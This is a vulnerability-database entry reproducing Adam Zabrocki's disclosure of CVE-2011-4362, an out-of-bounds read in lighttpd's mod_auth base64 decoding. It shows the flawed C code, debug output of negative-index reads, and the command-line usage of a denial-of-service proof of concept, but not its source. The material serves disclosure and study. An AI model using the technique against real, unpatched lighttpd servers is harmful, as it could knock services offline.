lighttpd - Denial of Service (PoC)

🗓️ 31 Dec 2011 00:00:00Reported by pi3Type

exploitdb🔗 www.exploit-db.com👁 238 Views

Lighttpd server vulnerability discovered by Xi Wang on 29th November 2011 leads to denial of service attack due to improper decoding of characters from the extended ASCII table in the mod_auth component

Reporter	Title	Published	Views	Family All 52
0day.today	Lighttpd Proof of Concept code for CVE-2011-4362	31 Dec 201100:00	–	zdt
Amazon	Medium: lighttpd	9 Jul 201200:00	–	amazon
Tenable Nessus	Amazon Linux AMI : lighttpd (ALAS-2012-107)	4 Sep 201300:00	–	nessus
Tenable Nessus	Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)	12 Jan 201200:00	–	nessus
Tenable Nessus	Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)	26 Jun 201200:00	–	nessus
Tenable Nessus	Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)	26 Jun 201200:00	–	nessus
Tenable Nessus	FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)	29 Dec 201100:00	–	nessus
Tenable Nessus	GLSA-201406-10 : lighttpd: Multiple vulnerabilities	16 Jun 201400:00	–	nessus
Tenable Nessus	lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS	28 Dec 201100:00	–	nessus
Tenable Nessus	openSUSE Security Update : lighttpd (openSUSE-2012-110)	13 Jun 201400:00	–	nessus

29 of November 2011 was the date of public disclosure interesting
vulnerability in lighttpd server. Xi Wang discovered that mod_auth
for this server does not propely decode characters from the extended
ASCII table. The vulnerable code is below:


"src/http_auth.c:67"
--- CUT ---
static const short base64_reverse_table[256] = ...;
static unsigned char * base64_decode(buffer *out, const char *in) {
	...
	int ch, ...;
	size_t i;
	...

		ch = in[i];
		...
		ch = base64_reverse_table[ch];
	...
}
--- CUT ---

Because variable 'in' is type 'char', characters above 0x80 lead to
negative indices.
This vulnerability may lead out-of-boud read and theoretically cause
Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where .rodata section before
the base64_reverse_table
table cause this situation.

I have added some extra debug in the lighttpd source code to see if this
vulnerability is
executed correctly. Here is output for one of the example:

--- CUT ---
ptr[0x9a92c48] size[0xc0] used[0x0]
127(. | 0 | 0)
-128(t | 1 | 0)
-127(e | 2 | 1)
-126(' | 3 | 2)
-125(e | 4 | 3)
-124(u | 5 | 3)
-123(r | 6 | 4)
-122(' | 7 | 5)
-121(s | 8 | 6)
-120(c | 9 | 6)
-119(i | 10 | 7)
-118(n | 11 | 8)
-117(i | 12 | 9)
-116(  | 13 | 9)
-115(a | 14 | 10)
-114(t | 15 | 11)
-113(. | 16 | 12)
-112(e | 17 | 12)
-111(u | 18 | 13)
-110(r | 19 | 14)
-109(' | 20 | 15)
-108(f | 21 | 15)
-107(i | 22 | 16)
-106(e | 23 | 17)
-105(: | 24 | 18)
-104(= | 25 | 18)
-103(o | 26 | 19)
-102(t | 27 | 20)
-101(o | 28 | 21)
-100(  | 29 | 21)
-99(a | 30 | 22)
-98(g | 31 | 23)
-97(. | 32 | 24)
-96(d | 33 | 24)
-95(g | 34 | 25)
-94(s | 35 | 26)
-93(: | 36 | 27)
-92(u | 37 | 27)
-91(s | 38 | 28)
-90(p | 39 | 29)
-89(o | 40 | 30)
-88(t | 41 | 30)
-87(d | 42 | 31)
-86(b | 43 | 32)
-85(c | 44 | 33)
-84(e | 45 | 33)
-83(d | 46 | 34)
-82(( | 47 | 35)
-81(n | 48 | 36)
-80(y | 49 | 36)
-79(h | 50 | 37)
-78(d | 51 | 38)
-77(g | 52 | 39)
-76(s | 53 | 39)
-75(  | 54 | 40)
-74(r | 55 | 41)
-73(p | 56 | 42)
-72(a | 57 | 42)
-71(n | 58 | 43)
-70(. | 59 | 44)
-69(. | 60 | 45)
-68(d | 61 | 45)
-67(g | 62 | 46)
-66(s | 63 | 47)
-65(: | 64 | 48)
-64(( | 65 | 48)
-63(d | 66 | 49)
-62(- | 67 | 50)
-61(e | 68 | 51)
-60(s | 69 | 51)
-59(  | 70 | 52)
-58(i | 71 | 53)
-57(s | 72 | 54)
-56(n | 73 | 54)
-55(  | 74 | 55)
-54(i | 75 | 56)
-53(l | 76 | 57)
-52(. | 77 | 57)
-51(. | 78 | 58)
-50(k | 79 | 59)
-49(0 | 80 | 60)
-48(% | 81 | 60)
-47(] | 82 | 61)
-46(p | 83 | 62)
-45(r | 84 | 63)
-44(0 | 85 | 63)
-43(% | 86 | 64)
-42(] | 87 | 65)
-41(s | 88 | 66)
-40(z | 89 | 66)
-39([ | 90 | 67)
-38(x | 91 | 68)
-37(x | 92 | 69)
-36(  | 93 | 69)
-35(s | 94 | 70)
-34(d | 95 | 71)
-33(0 | 96 | 72)
-32(% | 97 | 72)
-31(] | 98 | 73)
-30(. | 99 | 74)
-29(. | 100 | 75)
-28(d | 101 | 75)
-27(c | 102 | 76)
-26(d | 103 | 77)
-25(i | 104 | 78)
-24(g | 105 | 78)
-23(b | 106 | 79)
-22(s | 107 | 80)
-21(6 | 108 | 81)
-20(- | 109 | 81)
-19(t | 110 | 82)
-18(i | 111 | 83)
-17(g | 112 | 84)
-16(f | 113 | 84)
-15(i | 114 | 85)
-14(e | 115 | 86)
-13(. | 116 | 87)
-12(. | 117 | 87)
-11(. | 118 | 88)
-10(. | 119 | 89)
-9(. | 120 | 90)
-8(. | 121 | 90)
-7(. | 122 | 91)
-6(. | 123 | 92)
-5(. | 124 | 93)
-4(. | 125 | 93)
-3(. | 126 | 94)
-2(. | 127 | 95)
-1(. | 128 | 96)
k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
ptr[0x9a92c48] size[0xc0] used[0x60]
string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
--- CUT ---

First column is the offset so vulnerability is executed like it should be
(negative offsets). Second column is byte which is read out-of-bound.

How to run this very primitive Proof of Concept?

$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
$ ./p_cve-2011-4362 

	...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
]=- :::...

	Usage: ./p_cve-2011-4362 <options>

		Options:
			 -v <victim>
			 -p <port>
			 -d <remote_dir_for_auth>

$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa

	...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
]=- :::...

		[+] Preparing arguments... OK
		[+] Creating socket... OK
		[+] Connecting to [127.0.0.1]... OK
		[+] Sending dirty packet... OK

		[+] Check the website!

$ 

Lighttpd will log this situation probably in error-log file like this:

--- CUT ---
..
..
2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in
�Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp�	]߶��\���@V��x���ize

--- CUT ---

Maybe you can find vulnerable binary?

Best regards,
Adam 'pi3' Zabrocki


--
http://pi3.com.pl
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18295.c (p_cve-2011-4362.c)
http://blog.pi3.com.pl/?p=277

31 Dec 2011 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 25

EPSS0.04391

lighttpd vulnerability xi wang denial of service ascii mod_auth segmentation fault proof of concept